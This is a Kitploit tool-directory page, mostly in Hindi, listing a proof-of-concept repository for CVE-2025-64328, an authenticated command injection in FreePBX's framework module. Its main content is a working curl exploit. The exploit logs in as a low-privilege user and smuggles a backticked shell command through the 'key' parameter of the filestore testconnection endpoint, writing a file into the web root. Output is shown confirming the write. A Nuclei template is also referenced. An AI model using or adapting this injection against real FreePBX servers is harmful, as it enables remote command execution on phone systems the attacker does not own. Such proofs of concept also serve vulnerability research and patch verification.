Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-64328_FreePBX-framework-Command-Injection — CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module. | Kitploit
उपकरण/GitHubGitHub/mcorybillington/cve-2025-64328_freepbx-framework-command-injection
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubmcorybillington/cve-2025-64328_freepbx-framework-command-injection

CVE-2025-64328_FreePBX-framework-Command-Injection

CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module.

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
19 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-64328 FreePBX में प्रमाणित कमांड इंजेक्शन framework मॉड्यूल में

CVE-2025-64328 FreePBX में framework मॉड्यूल में प्रमाणित कमांड इंजेक्शन के लिए सरल प्रूफ ऑफ कॉन्सेप्ट रिपॉजिटरी।

पूरा लेख यहाँ: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/

curl प्रूफ ऑफ कॉन्सेप्ट

root@kitploit:~
$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
  "status": true,
  "message": "Login failed"
}

$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2

Nuclei टेम्पलेट:

CVE-2025-64328.yaml

टूल डाउनलोड करें